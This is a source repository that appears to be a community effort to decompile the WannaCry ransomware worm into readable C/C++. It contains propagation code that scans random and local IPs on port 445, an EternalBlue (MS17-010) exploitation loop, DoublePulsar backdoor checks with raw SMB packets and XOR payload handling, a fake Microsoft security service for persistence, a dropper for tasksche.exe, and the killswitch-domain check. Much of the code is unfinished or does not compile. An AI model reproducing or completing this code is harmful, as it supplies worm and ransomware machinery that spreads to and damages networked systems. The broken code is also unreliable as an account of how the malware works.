├── README.md ├── encryptorDLL └── dllmain.cpp ├── Payload.cpp ├── functions.cpp ├── launcher.dll └── dllmain.cpp ├── Network.cpp ├── WinMain.cpp ├── Doublepulsar.cpp ├── Eternalblue.cpp └── Network.h /README.md: -------------------------------------------------------------------------------- 1 | # WannacryDecompiled 2 | 3 | Any help with this project would be great! The purpose of this project is to fully decompile Wannacry into human readable C code. 4 | -------------------------------------------------------------------------------- /encryptorDLL/dllmain.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | //help from: 4 | //https://www.youtube.com/watch?v=ru5VzUigKqw 5 | 6 | //compile and embed in main project 7 | //this file is loaded by Wannacry for the encryption portion 8 | 9 | BOOL WINAPI DllMain(HINSTANCE hModule, DWORD dwReason, LPVOID) 10 | { 11 | 12 | switch (dwReason) 13 | { 14 | case DLL_PROCESS_ATTACH: 15 | { 16 | MessageBoxA(NULL, "DLL_PROCESS_ATTACH", "DLL_PROCESS_ATTACH", MB_OK); 17 | } 18 | break; 19 | case DLL_PROCESS_DETACH: 20 | { 21 | //detach 22 | } 23 | break; 24 | case DLL_THREAD_ATTACH: 25 | case DLL_THREAD_DETACH: 26 | break; 27 | } 28 | 29 | return TRUE; 30 | } 31 | -------------------------------------------------------------------------------- /Payload.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | //EXE file global here 5 | volatile HGLOBAL hDLL_x86; 6 | volatile HGLOBAL hDLL_x64; 7 | 8 | //init the DLL payload here 9 | //read from Wannacry in IDA 10 | //also here: https://www.acronis.com/en-us/blog/posts/wannacry-attack-what-it-and-how-protect-your-computer 11 | //Memory alloc functions: https://www.tenouk.com/visualcplusmfc/visualcplusmfc20.html 12 | void initialize_payload() 13 | { 14 | /* 15 | 32-bit dll start address 0x40B020, size is 0x4060 bytes 16 | 64-bit dll start address 0x40F080, size is 0xc8a4 
bytes 17 | */ 18 | DWORD NumberOfBytesRead; 19 | DWORD fileSize; 20 | //size = 0x4060 converted to decimal: 16480 21 | //Possibly -> GlobalAlloc(GPTR, 5298176) 22 | hDLL_x86 = GlobalAlloc(GMEM_ZEROINIT, 5298176); 23 | /* 0x50D000 found in IDA but most likely: 0x506000 for 32 bit */ 24 | 25 | //size = 0xc8a4 converted to decimal: 51364 26 | //Possibly -> GlobalAlloc(GPTR, 5298176) 27 | hDLL_x64 = GlobalAlloc(GMEM_ZEROINIT, 5298176); //0x50D000 found in IDA 28 | 29 | //if no errors continue 30 | if(hDLL_x86 && hDLL_x64) 31 | { 32 | //GENERIC_READ is 0x80000000 and GENERIC_WRITE is 0x40000000 33 | HANDLE fileHandle = CreateFileA(Filename, 0x80000000, 1, NULL, 3, 4, NULL); 34 | if(fileHandle != INVALID_HANDLE_VALUE) 35 | { 36 | fileSize = GetFileSize(fileHandle, NULL); 37 | *(DWORD*)hDLL_x86 + 0x4060 = fileSize; //Dword length written in x86 DLL buffer 38 | *(DWORD*)hDLL_x64 + 0xc8a4 = fileSize; //Dword length written in x64 DLL buffer 39 | ReadFile(fileHandle, hDLL_x86 + 0x4060 + sizeof(DWORD), &fileSize, &NumberOfBytesRead, 0); 40 | ReadFile(fileHandle, hDLL_x64 + 0xc8a4 + sizeof(DWORD), &fileSize, &NumberOfBytesRead, 0); 41 | CloseHandle(fileHandle); 42 | } 43 | } 44 | else 45 | { 46 | GlobalFree(hMemory_x86); 47 | GlobalFree(hMemory_x64); 48 | } 49 | } 50 | -------------------------------------------------------------------------------- /functions.cpp: -------------------------------------------------------------------------------- 1 | /* 2 | https://github.com/bhassani/EternalBlueC/blob/2bbf166a650b5ddab9e728794f65ebdc2d6eedcb/EternalBlue%20All%20in%20one/utils/ex_string.c 3 | */ 4 | 5 | int replace_str(char *pStrBuf, char *pOld, char *pNew); 6 | 7 | static int _str_replace(char *p_result, char* p_source, char* p_seach, char *p_repstr) 8 | { 9 | int c = 0; 10 | int repstr_leng = 0; 11 | int searchstr_leng = 0; 12 | char *p1; 13 | char *presult = p_result; 14 | char *psource = p_source; 15 | char *prep = p_repstr; 16 | char *pseach = p_seach; 17 | int nLen = 0; 18 
| repstr_leng = strlen(prep); 19 | searchstr_leng = strlen(pseach); 20 | 21 | do 22 | { 23 | p1 = strstr(psource, p_seach); 24 | if (p1 == 0) 25 | { 26 | strcpy(presult, psource); 27 | return c; 28 | } 29 | c++; //匹配子串计数加1; 30 | //printf("结果:%s\r\n", p_result); 31 | //printf("源字符:%s\r\n", p_source); 32 | // 拷贝上一个替换点和下一个替换点中间的字符串 33 | nLen = p1 - psource; 34 | memcpy(presult, psource, nLen); 35 | // 拷贝需要替换的字符串 36 | memcpy(presult + nLen, p_repstr, repstr_leng); 37 | psource = p1 + searchstr_leng; 38 | presult = presult + nLen + repstr_leng; 39 | } 40 | while (p1); 41 | 42 | return c; 43 | } 44 | 45 | //used to replace the treeid and userid placeholders in the EternalBlue code found in Wannacry 46 | //Sample: replace_str(EternalBluePacket1,"__TREEID__PLACEHOLDER__", treeid_from_packet) 47 | int replace_str(char *pStrBuf, char *pOld, char *pNew) 48 | { 49 | int newLen = 0; 50 | char *pTmpBuf = NULL; 51 | 52 | newLen = strlen(pStrBuf) + 1000; 53 | pTmpBuf = (char *)malloc(newLen); 54 | if(pTmpBuf == NULL) 55 | return -1; 56 | memset(pTmpBuf, 0x00, newLen); 57 | 58 | if(_str_replace(pTmpBuf, pStrBuf, pOld, pNew) <= 0) 59 | { 60 | free(pTmpBuf); 61 | return -2; 62 | } 63 | memset(pStrBuf, 0x00, strlen(pStrBuf)); 64 | strcat(pStrBuf, pTmpBuf); 65 | free(pTmpBuf); 66 | 67 | return 0; 68 | } 69 | 70 | -------------------------------------------------------------------------------- /launcher.dll/dllmain.cpp: -------------------------------------------------------------------------------- 1 | // dllmain.cpp : Defines the entry point for the DLL application. 
2 | #define _CRT_SECURE_NO_WARNINGS 3 | 4 | #include 5 | #include 6 | 7 | //assistance from: 8 | //https://blog.kartone.ninja/2019/05/23/malware-analysis-a-wannacry-sample-found-in-the-wild/ 9 | //https://www.programmersought.com/article/5646318912/ 10 | //https://www.ired.team/offensive-security/code-injection-process-injection/loading-and-executing-shellcode-from-portable-executable-resources 11 | //https://cboard.cprogramming.com/windows-programming/117578-hmodule-current-dll.html 12 | //https://stackoverflow.com/questions/13408306/including-a-text-file-as-a-local-resource-in-an-exe 13 | //https://docs.microsoft.com/en-us/windows/win32/procthread/creating-processes 14 | 15 | extern "C" VOID __declspec(dllexport) PlayGame(); 16 | int ExtractAndCreate(); 17 | int RunProcess(); 18 | 19 | //global 20 | char szDest[MAX_PATH]; 21 | HMODULE hInstDLL; 22 | 23 | extern "C" VOID __declspec(dllexport) PlayGame() 24 | { 25 | sprintf(szDest, "C:\\%s\\%s", "WINDOWS", "mssecsvc.exe"); 26 | ExtractAndCreate(); 27 | RunProcess(); 28 | } 29 | 30 | int ExtractAndCreate() 31 | { 32 | HRSRC hSrc; 33 | HANDLE hFile; 34 | DWORD NumberOfBytesToWrite = 0; 35 | DWORD ResourceSize; 36 | HGLOBAL hResourceData; 37 | PVOID pRsrc; 38 | hSrc = FindResourceA(hInstDLL, (LPCSTR)101, "W"); 39 | hResourceData = LoadResource(hInstDLL, hSrc); 40 | pRsrc = LockResource(hResourceData); 41 | ResourceSize = SizeofResource(hInstDLL, hSrc); 42 | 43 | //dwFlagsAndTrributes = 4 44 | //find out whatever 0x40000000 is 45 | //UPDATE: GENERIC_WRITE is 0x40000000 46 | hFile = CreateFileA(szDest, 0x40000000, 2, 0, 2, 4, 0); 47 | if (!hFile) 48 | { 49 | //+4 to skip the DWORD length that's written before the actual resource 50 | WriteFile(hFile, (PVOID*)pRsrc + 4, ResourceSize, &NumberOfBytesToWrite, NULL); 51 | CloseHandle(hFile); 52 | } 53 | return 0; 54 | } 55 | 56 | int RunProcess() 57 | { 58 | PROCESS_INFORMATION ProcessInformation; 59 | STARTUPINFOA StartupInfo; 60 | /* 61 | ProcessInformation.hProcess = 0; 
62 | ProcessInformation.hThread = 0; 63 | ProcessInformation.dwProcessId = 0; 64 | */ 65 | //memset(&StartupInfo.lpReserved, 0, sizeof(StartupInfo)); 66 | /* 67 | StartupInfo.cb = 104; 68 | StartupInfo.wShowWindow = 0; 69 | StartupInfo.dwFlags = 129; 70 | */ 71 | ZeroMemory(&StartupInfo, sizeof(StartupInfo)); 72 | StartupInfo.cb = sizeof(StartupInfo); 73 | //ZeroMemory(&StartupInfo, sizeof(StartupInfo)); 74 | // StartupInfo.cb = sizeof(StartupInfo); 75 | //ZeroMemory(&ProcessInformation, sizeof(ProcessInformation)); 76 | if(CreateProcess(NULL, (LPWSTR)szDest, NULL, NULL, FALSE, 0, NULL, NULL, (LPSTARTUPINFOW)&StartupInfo, &ProcessInformation)) 77 | { 78 | CloseHandle(ProcessInformation.hThread); 79 | CloseHandle(ProcessInformation.hProcess); 80 | } 81 | return 0; 82 | } 83 | 84 | BOOL APIENTRY DllMain( HMODULE hModule, 85 | DWORD ul_reason_for_call, 86 | LPVOID lpReserved 87 | ) 88 | { 89 | hInstDLL = hModule; 90 | switch (ul_reason_for_call) 91 | { 92 | case DLL_PROCESS_ATTACH: 93 | //for testing purposes; remove in final version 94 | MessageBoxA(NULL, "DLL_PROCESS_ATTACH", "DLL_PROCESS_ATTACH", MB_OK); 95 | case DLL_THREAD_ATTACH: 96 | case DLL_THREAD_DETACH: 97 | //for testing purposes; remove in final version 98 | MessageBoxA(NULL, "DLL_PROCESS_DETACH", "DLL_PROCESS_DETACH", MB_OK); 99 | case DLL_PROCESS_DETACH: 100 | break; 101 | } 102 | return TRUE; 103 | } 104 | -------------------------------------------------------------------------------- /Network.cpp: -------------------------------------------------------------------------------- 1 | //https://blog.malwarebytes.com/threat-analysis/2017/05/the-worm-that-spreads-wanacrypt0r/ 2 | //skeleton code at this moment 3 | //still a work in progress 4 | 5 | //https://stackoverflow.com/questions/37838490/how-to-properly-set-a-flag-in-the-write-fds-and-select-in-c 6 | int canConnectToPort445(char *ip) 7 | { 8 | struct sockaddr name; 9 | struct timeval timeout; 10 | fd_set writefds; 11 | SOCKET control_sock; 12 | 
u_long argp; 13 | int result; 14 | 15 | FD_ZERO(&writefds); 16 | 17 | name.sin_family = AF_INET; 18 | name.sin_addr.s_addr = inet_addr(ip); 19 | name.sin_port = htons(445); 20 | 21 | control_sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); 22 | if(control_sock == -1) 23 | { 24 | result = 0; 25 | } else { 26 | ioctlsocket(control_sock, FIONBIO, &argp); 27 | writefds.fd_array[0] = control_sock; 28 | writefds.fd_count = 1; 29 | timeout.tv_sec = 1; 30 | timeout.tv_usec = 0; 31 | connect(control_sock, (struct sockaddr*)&name, sizeof(name)); 32 | int ret = select(0, 0, &writefds, 0, &timeout); 33 | closesocket(control_sock); 34 | result = ret; 35 | } 36 | return result; 37 | } 38 | 39 | DWORD MS17_010(DWORD LPPARAM) 40 | { 41 | lpparam = (struct in_addr) ; 42 | int attemptCount; 43 | //CheckMS17Vulnerability here; continue if vulnerable 44 | if ( CheckForEternalBlue(&target, 445)) 45 | { 46 | attemptCount = 0; 47 | do 48 | { 49 | Sleep(3000); 50 | if ( IsDOUBLEPULSARInstalled(&target, 1, 445) ) 51 | break; 52 | Sleep(3000); 53 | //EternalBlue pwn here 54 | EternalBluePwn(&target, 445); 55 | ++attemptCount; 56 | } while ( attemptCount < 5 ); 57 | } 58 | Sleep(3000); 59 | if ( IsDOUBLEPULSARInstalled(&target, 1, 445)) 60 | { 61 | runPayloadOnTarget(&target, 1, 445); 62 | } 63 | endthreadex(0); 64 | return 0; 65 | } 66 | 67 | int scanIP(void *arg) 68 | { 69 | char *target = (char*)arg; 70 | HANDLE ExploitHandle; 71 | if (canConnectToPort445(target) > 0) 72 | { 73 | ExploitHandle = (HANDLE)_beginthreadex(NULL, MS17_010, target, 0, 0); 74 | //Not sure if the if statement is needed but we'll keep it here for now 75 | if( ExploitHandle ) 76 | { 77 | if (WaitForSingleObject(ExploitHandle, 60000) == 258 )) 78 | { 79 | TerminateThread(ExploitHandle, 0); 80 | CloseHandle(ExploitHandle); 81 | } 82 | } 83 | } 84 | endthreadex(0); 85 | return 0; 86 | } 87 | 88 | int __stdcall LANThreadFunc(void *param) 89 | { 90 | //Obtain local IP address 91 | 92 | 93 | //Generate other IP addresses 
94 | char local_generated_ip; 95 | 96 | HANDLE ScanIPHandle; 97 | ScanIPHandle = (HANDLE)_beginthreadex(0, 0, scanIP, local_generated_ip, 0, 0); 98 | 99 | if( ScanIPHandle ) 100 | { 101 | if (WaitForSingleObject(ScanIPHandle, 60000) == 258 )) 102 | { 103 | TerminateThread(ScanIPHandle, 0); 104 | CloseHandle(ScanIPHandle); 105 | } 106 | } 107 | 108 | int __stdcall WANThreadFunc(void *param) 109 | { 110 | srand(GetTickCount()); 111 | //Generate IP address 112 | char *generated_ip[16]; 113 | sprintf(generated_ip, "%d.%d.%d.%d", rand() % 254, rand() % 254, rand() % 254, rand() % 254 ); 114 | 115 | HANDLE ScanIPHandle; 116 | ScanIPHandle = (HANDLE)_beginthreadex(0, 0, scanIP, generated_ip, 0, 0); 117 | 118 | if( ScanIPHandle ) 119 | { 120 | if (WaitForSingleObject(ExploitHandle, 60000) == 258 )) 121 | { 122 | TerminateThread(ExploitHandle, 0); 123 | CloseHandle(ExploitHandle); 124 | 125 | } 126 | } 127 | 128 | /* 129 | Threading: https://www.bogotobogo.com/cplusplus/multithreaded2A.php 130 | http://simplesamples.info/windows/_beginthreadex.aspx 131 | https://jeffpar.github.io/kbarchive/kb/132/Q132078/ 132 | https://www.programmersought.com/article/57053139965/ 133 | https://sodocumentation.net/winapi/topic/1756/process-and-thread-management 134 | */ 135 | int threadScanMain() 136 | { 137 | HANDLE LanThread; 138 | LanThread = (HANDLE)_beginthreadex(NULL, NULL, LANThreadFunc, 0, 0, 0); 139 | 140 | int thread_count = 0; 141 | DWORD dwThreadIdArray[128]; 142 | HANDLE hThreadArray[128]; 143 | do 144 | { 145 | hThreadArray[i] = CreateThread(NULL, 0, WANThreadFunc, NULL, 0, &dwThreadIdArray[i]); 146 | thread_count++; 147 | Sleep(2000); 148 | } 149 | }while(thread_count <= 128); 150 | } 151 | -------------------------------------------------------------------------------- /WinMain.cpp: -------------------------------------------------------------------------------- 1 | 
//https://medium.com/@yogeshojha/reverse-engineering-wannacry-ransomware-using-ghidra-finding-the-killswitch-a212807e9354 2 | //https://blog.malwarebytes.com/threat-analysis/2017/05/the-worm-that-spreads-wanacrypt0r/ 3 | 4 | //Video: https://www.youtube.com/watch?v=Sv8yu12y5zM 5 | //Video: https://www.youtube.com/watch?v=Q90uZS3taG0 6 | //Video: https://www.youtube.com/watch?v=ru5VzUigKqw 7 | //Help from: 8 | //https://tech-zealots.com/threat-lab/dissecting-wannacry-ransomware-to-its-core-technical-analysis/ 9 | //https://www.youtube.com/watch?v=Sv8yu12y5zM 10 | //https://www.microsoft.com/security/blog/2017/05/12/wannacrypt-ransomware-worm-targets-out-of-date-systems/ 11 | //https://blogs.windows.com/russia/2017/05/17/windows-vs-wannacrypt/ 12 | 13 | /* massive IDA screenshots & help from article: 14 | https://www.programmersought.com/article/23574059266/ 15 | */ 16 | 17 | 18 | #include 19 | #include 20 | #include 21 | #pragma comment(lib, "wininet.lib") 22 | 23 | //globals 24 | char executable_path[MAX_PATH]; //Get executable path 25 | 26 | //obtain the network card configuration and IP address details 27 | int AdapterInfo() 28 | { 29 | GetAdaptersInfo(); 30 | } 31 | 32 | //not finished 33 | int LAN_Spread() 34 | { 35 | LOBYTE(); 36 | AdapterInfo(); 37 | } 38 | 39 | //not finished 40 | void InitCryptoContext() 41 | { 42 | CryptAcquireContextA(Unknown, NULL, UNK, UNK, &0xf0000000); 43 | InitializeCriticalSection(LPCRITICAL_SECTION, &UNKNOWN); 44 | } 45 | 46 | int initializeSockets() 47 | { 48 | WSADATA WSAData; 49 | if(WSAStartup(MAKEWORD(2,2), &WSAData)) 50 | { 51 | return 0; 52 | } 53 | InitCryptoContext(); //CryptAcquireContext 54 | initialize_payload(); 55 | } 56 | 57 | int InitOperations() 58 | { 59 | int result; 60 | int threadCount; 61 | result = initializeSockets(); 62 | if(result) 63 | { 64 | hLanSpread = beginthreadex(0, 0, LAN_Spread, 0, 0, 0); 65 | if(hLanSpread) 66 | { 67 | CloseHandle(hLanSpread); 68 | } 69 | threadCount = 0; 70 | do 71 | { 72 | 
hWANSpread = beginthreadex(0, 0, WAN_Spread, threadCount, 0, 0); 73 | if(hWANSpread) 74 | { 75 | CloseHandle(hWANSpread); 76 | } 77 | Sleep(2000); 78 | hWANSpread++; 79 | } while (threadCount < 128); 80 | result = 0; 81 | } 82 | return result; 83 | } 84 | 85 | int create_service() 86 | { 87 | SC_HANDLE hSCManager; 88 | SC_HANDLE hService; 89 | char exec_with_args[260]; 90 | 91 | sprintf(exec_with_args, "%s -m security", executable_path); 92 | hSCManager = OpenSCManagerA(NULL, NULL, SC_MANAGER_ALL_ACCESS); 93 | if(hSCManager != NULL) 94 | { 95 | //Fix this 96 | hService = CreateServiceA(hSCManager, "mssecsvc2.0", "Microsoft Security Center (2.0) Service", 0xf01ff, 16, 2, 1, &exec_with_args, NULL, NULL, NULL, NULL, NULL); 97 | if(hService != NULL) 98 | { 99 | StartServiceA(hService, 0, NULL); 100 | CloseServiceHandle(hService); 101 | } 102 | CloseServiceHandle(hSCManager); 103 | return 0; 104 | } 105 | return 0; 106 | } 107 | 108 | //not finished 109 | int drop_tasksche() 110 | { 111 | HANDLE hModule = GetModuleHandleW("kernel32.dll"); 112 | HANDLE hFile; 113 | 114 | //fix these function definitions 115 | /* 116 | GetProcAddress(hModule, "CreateProcessA"); 117 | GetProcAddress(hModule, "CreateFileA"); 118 | GetProcAddress(hModule, "WriteFile"); 119 | GetProcAddress(hModule, "CloseHandle"); 120 | 121 | typedef BOOL (WINAPI *_CLOSEHANDLE)(HANDLE hObject); 122 | typedef HANDLE (WINAPI *_CREATEFILEW)(LPCTSTR lpFileName, DWORD dwDesiredAccess, DWORD dwShareMode, LPSECURITY_ATTRIBUTES lpSecurityAttributes, DWORD dwCreationDisposition, DWORD dwFlagsAndAttributes, HANDLE hTemplateFile); 123 | 124 | fCloseHandle = (_CLOSEHANDLE)GetProcAddress(hModule, CLOSEHANDLE, 0); 125 | fCreateFile = (_CREATEFILEW)GetProcAddress(hModule, CREATEFILEW, 0); 126 | 127 | */ 128 | //copied from: https://github.com/gbmaster/loadLibrary/blob/master/kernel32.cpp 129 | 130 | PROCESS_INFORMATION pi; 131 | STARTUPINFOA si; 132 | DWORD nNumberOfBytesWritten; 133 | 134 | HRSRC hResInfo = 
FindResourceA(0, 1831, "UNK"); 135 | HGLOBAL hResData = LoadResource(0, hResInfo); 136 | PVOID lpBuffer = LockResource(hResData); 137 | DWORD nNumberOfBytesToWrite = SizeofResource(0, hResInfo); 138 | char szFileName[] = "tasksche.exe"; 139 | char szPath[MAX_PATH]; 140 | char szNewPath[MAX_PATH]; 141 | sprintf(szPath, "C:\\%s\\%s", "WINDOWS", szFileName); 142 | sprintf(szPath, "C:\\%s\\qeriuwjhrf", "WINDOWS"); 143 | //MoveFileExA(szPath, szNewPath, REPLACE_EXISTING); 144 | MoveFileExA(szPath, szNewPath, 1); 145 | //GENERIC_WRITE is 0x40000000 146 | //CreateFileA(szPath, GENERIC_WRITE, NULL, NULL, CREATE_ALWAYS, SYSTEM, NULL); 147 | hFile = CreateFileA(szPath, 0x40000000, 0, 0, 2, 4, 0); 148 | if(hFile != INVALID_HANDLE_VALUE) 149 | { 150 | WriteFile(hFile, lpBuffer, nNumberOfBytesToWrite, &nNumberOfBytesWritten, 0); 151 | CloseHandle(hFile); 152 | } 153 | //add the /i parameter to the end of tasksche 154 | strcat(szPath, " /i"); 155 | //run tasksche with /i parameters 156 | if(CreateProcessA(NULL, szPath, 0, 0, 0, 0x8000000, 0, 0, &pi, &si)) 157 | { 158 | CloseHandle(hFile); 159 | CloseHandle(hModule); 160 | } 161 | } 162 | 163 | int no_argument_handler() 164 | { 165 | create_service(); 166 | drop_tasksche(); 167 | } 168 | 169 | //Not finished yet, must be fixed for this to work 170 | SERVICE_STATUS_HANDLE ServiceMain() 171 | { 172 | SERVICE_STATUS_HANDLE result; 173 | 174 | ServiceStatus.dwServiceType = 32; 175 | ServiceStatus.dwCurrentState = 2; 176 | ServiceStatus.dwControlsaccepted = 1; 177 | ServiceStatus.dwWin32ExitCode = 0; 178 | ServiceStatus.dwServiceSpecificExitCode = 0; 179 | ServiceStatus.dwCheckPoint = 0; 180 | ServiceStatus.dwWaitHint = 0; 181 | 182 | result = RegisterServiceCtrlHandlerA(ServiceName, HandlerProc); 183 | if(result) 184 | { 185 | ServiceStatus.dwCurrentState = 4; 186 | ServiceStatus.dwCheckPoint = 4; 187 | Servicestatus.dwWaitHint = 0; 188 | SetServicestatus(result, &ServiceStatus); 189 | InitOperations(); 190 | Sleep(86400000); 191 | 
ExitProcess(1); 192 | } 193 | return result; 194 | } 195 | 196 | //https://github.com/jnwilson/MalwareExercises/blob/0994222f90bd7de305ff8115dec053065f8d013f/Chapter%207/ex1.c 197 | //https://github.com/StefanoBelli/lol/blob/92fd0e349ac42eb71ae9a1302559567cca64c0a1/Win32/ServiceLauncher.c 198 | //https://github.com/sagishahar/scripts/blob/master/windows_service.c 199 | //IDA screenshots: https://www.programmersought.com/article/23574059266/ 200 | int RealMain() 201 | { 202 | SC_HANDLE hSCManager; 203 | SC_HANDLE SCObject; 204 | SERVICE_TABLE_ENTRYA ServiceStartTable; 205 | int *argc; 206 | char szName[] = "MSSecSvc"; 207 | GetModuleFileName(NULL, &executable_path, sizeof(executable_path)); 208 | 209 | argc = (int*)__p__argc(); 210 | if(*argc < 2) 211 | { 212 | no_argument_handler(); 213 | } 214 | 215 | /* https://docs.microsoft.com/en-us/windows/win32/services/service-security-and-access-rights */ 216 | hSCManager = OpenSCManager(0, 0, SC_MANAGER_ALL_ACCESS); 217 | 218 | if(!hSCManager) 219 | { 220 | hSCObject = OpenServiceA(hSCManager, szName, SERVICE_START); 221 | if(!hSCObject) 222 | { 223 | //sub_407FA0 hSCObject, 0x3c); 224 | CloseServiceHandle(hSCObject); 225 | } 226 | CloseServicehandle(hSCManager); 227 | } 228 | 229 | ServiceStartTable.lpServiceName = "MSSecSvc 2.0"; 230 | ServiceStartTable.lpServiceProc = (LPSERVICE_MAIN_FUNCTION) ServiceMain; 231 | 232 | return StartServiceCtrlDispatcher(&ServiceStartTable); 233 | 234 | //CloseServiceHandle(hSCManager); 235 | //CloseServiceHandle(SCObject); 236 | } 237 | 238 | int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, PWSTR pCmdLine, int nCmdShow) 239 | { 240 | char szUrl[] = "http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com"; 241 | HINTERNET hInternet; 242 | HINTERNET hUrl; 243 | hInternet = InternetOpen(NULL, INTERNET_OPEN_TYPE_DIRECT, NULL, NULL, 0); 244 | hUrl = InternetOpenUrl(hInternet, szUrl, NULL, 0, INTERNET_FLAG_RELOAD | INTERNET_FLAG_NO_CACHE_WRITE, NULL); 245 | if (hUrl) 246 | { 
247 | InternetCloseHandle(hUrl); 248 | InternetCloseHandle(hInternet); 249 | return 0; 250 | } 251 | else { 252 | InternetCloseHandle(hUrl); 253 | InternetCloseHandle(hInternet); 254 | RealMain(); 255 | } 256 | return 0; 257 | } 258 | -------------------------------------------------------------------------------- /Doublepulsar.cpp: -------------------------------------------------------------------------------- 1 | //To determine if DoublePulsar is present 2 | unsigned char SmbNegociate[] = 3 | "\x00\x00\x00\x2f\xff\x53\x4d\x42\x72\x00" 4 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 5 | "\x00\x00\x00\x00\x88\x05\x00\x00\x00\x00\x00\x0c\x00\x02\x4e\x54" 6 | "\x20\x4c\x4d\x20\x30\x2e\x31\x32\x00"; 7 | 8 | unsigned char Session_Setup_AndX_Request[] = 9 | "\x00\x00\x00\x48\xff\x53\x4d\x42\x73\x00" 10 | "\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 11 | "\x00\x00\xff\xff\x88\x05\x00\x00\x00\x00\x0d\xff\x00\x00\x00\xff" 12 | "\xff\x02\x00\x88\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 13 | "\x00\x01\x00\x00\x00\x0b\x00\x00\x00\x6e\x74\x00\x70\x79\x73\x6d" 14 | "\x62\x00"; 15 | 16 | unsigned char treeConnectRequest[] = 17 | "\x00\x00\x00\x58\xff\x53\x4d\x42\x75\x00" 18 | "\x00\x00\x00\x18\x07\xc8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 19 | "\x00\x00\x00\x00\xff\xfe\x00\x08\x00\x03\x04\xff\x00\x58\x00\x08" 20 | "\x00\x01\x00\x2d\x00\x00\x5c\x00\x5c\x00\x31\x00\x37\x00\x32\x00" 21 | "\x2e\x00\x32\x00\x32\x00\x2e\x00\x35\x00\x2e\x00\x34\x00\x36\x00" 22 | "\x5c\x00\x49\x00\x50\x00\x43\x00\x24\x00\x00\x00\x3f\x3f\x3f\x3f" 23 | "\x3f\x00"; 24 | 25 | unsigned char trans2_session_setup[] = 26 | "\x00\x00\x00\x4E\xFF\x53\x4D\x42\x32\x00\x00\x00\x00\x18\x07\xC0" 27 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\xFF\xFE" 28 | "\x00\x08\x41\x00\x0F\x0C\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00" 29 | "\x00\xA6\xD9\xA4\x00\x00\x00\x0C\x00\x42\x00\x00\x00\x4E\x00\x01" 30 | 
"\x00\x0E\x00\x0D\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 31 | "\x00\x00" 32 | 33 | unsigned int LE2INT(unsigned char *data) 34 | { 35 | unsigned int b; 36 | b = data[3]; 37 | b <<= 8; 38 | b += data[2]; 39 | b <<= 8; 40 | b += data[1]; 41 | b <<= 8; 42 | b += data[0]; 43 | return b; 44 | } 45 | 46 | unsigned int ComputerDOUBLEPULSARXorKey(unsigned int key) 47 | { 48 | return 2 * key ^ ((((key >> 16) | key & 0xFF0000) >> 8) | (((key << 16) | key & 0xFF00) << 8)); 49 | } 50 | 51 | int xor_payload(int xor_key, int buf, int size) 52 | { 53 | int i; 54 | char __xor_key[5]; 55 | i = 0; 56 | *&__xor_key[1] = 0; 57 | *__xor_key = xor_key; 58 | if (size <= 0) 59 | return 0; 60 | do 61 | { 62 | *(i + buf) ^= __xor_key[i % 4]; 63 | ++i; 64 | } while ( i < size ); 65 | return 0; 66 | } 67 | 68 | int IsDOUBLEPULSARInstalled(char *host, int flagUninstall, u_short hostshort) 69 | { 70 | SOCKET dsock; 71 | struct sockaddr name; 72 | char userid[2]; 73 | char treeid[2]; 74 | char recvbuff[1024]; 75 | 76 | name.sin_family = AF_INET; 77 | name.sin_addr.s_addr = inet_addr(host); 78 | name.sin_port = htons(hostshort); 79 | dsock = socket(AF_INET, SOCK_STREAM, 0); 80 | connect(dsock, (struct sockaddr*) &name, sizeof(name)); 81 | 82 | //send SMB negociate packet 83 | send(dsock, (char*)SmbNegociate, sizeof(SmbNegociate) - 1, 0); 84 | recv(dsock, (char*)recvbuff, sizeof(recvbuff), 0); 85 | 86 | //send Session Setup AndX request 87 | send(dsock, (char*)Session_Setup_AndX_Request, sizeof(Session_Setup_AndX_Request) - 1, 0); 88 | recv(dsock, (char*)recvbuff, sizeof(recvbuff), 0); 89 | 90 | //copy userID from recvbuff @ 32,33 91 | userid[0] = recvbuff[32]; 92 | userid[1] = recvbuff[33]; 93 | 94 | //update userID in the tree connect request 95 | treeConnectRequest[32] = userid[0]; 96 | treeConnectRequest[33] = userid[1]; 97 | send(dsock, (char*)treeConnectRequest, sizeof(treeConnectRequest) - 1, 0); 98 | recv(dsock, (char*)recvbuff, sizeof(recvbuff), 0); 99 | 100 | //copy treeID from 
recvbuff @ 28, 29 101 | treeid[0] = recvbuff[28]; 102 | treeid[1] = recvbuff[29]; 103 | 104 | trans2_session_setup[28] = treeid[0]; 105 | trans2_session_setup[29] = treeid[1] 106 | trans2_session_setup[32] = userid[0]; 107 | trans2_session_setup[33] = userid[1]; 108 | 109 | send(dsock, (char*)trans2_session_setup, sizeof(trans2_session_setup) - 1, 0); 110 | recv(dsock, (char*)recvbuff, sizeof(recvbuff), 0); 111 | 112 | if (recvbuff[34] == 0x51) 113 | { 114 | if ( flagUninstall ) 115 | { 116 | WORD burn1, burn2, burn3, burn4, burn5; 117 | 118 | burn1 = 66; //update multiplex ID to x42 119 | burn2 = 14; //burn command - trans2_session_setup[49] = "\x0e" 120 | burn3 = 105; //burn command - trans2_session_setup[50] = "\x69" 121 | burn4 = 0; //burn command - trans2_session_setup[51] = "\x00" 122 | burn5 = 0; //burn command - trans2_session_setup[52] = "\x00" 123 | 124 | //modify our trans2 session packet to include the burn command 125 | memcpy(trans2_session_setup + 0x22, (char*)&burn1, 1); 126 | memcpy(trans2_session_setup + 0x31, (char*)&burn2, 1); 127 | memcpy(trans2_session_setup + 0x32, (char*)&burn3, 1); 128 | memcpy(trans2_session_setup + 0x33, (char*)&burn4, 1); 129 | memcpy(trans2_session_setup + 0x34, (char*)&burn5, 1); 130 | send(dsock, (char*)trans2_session_setup, sizeof(trans2_session_setup) - 1, 0); 131 | recv(dsock, (char*)uninstall_response, 1024, 0); 132 | closesocket(dsock); 133 | return 1; 134 | } 135 | closesocket(dsock); 136 | } 137 | return 0; 138 | } 139 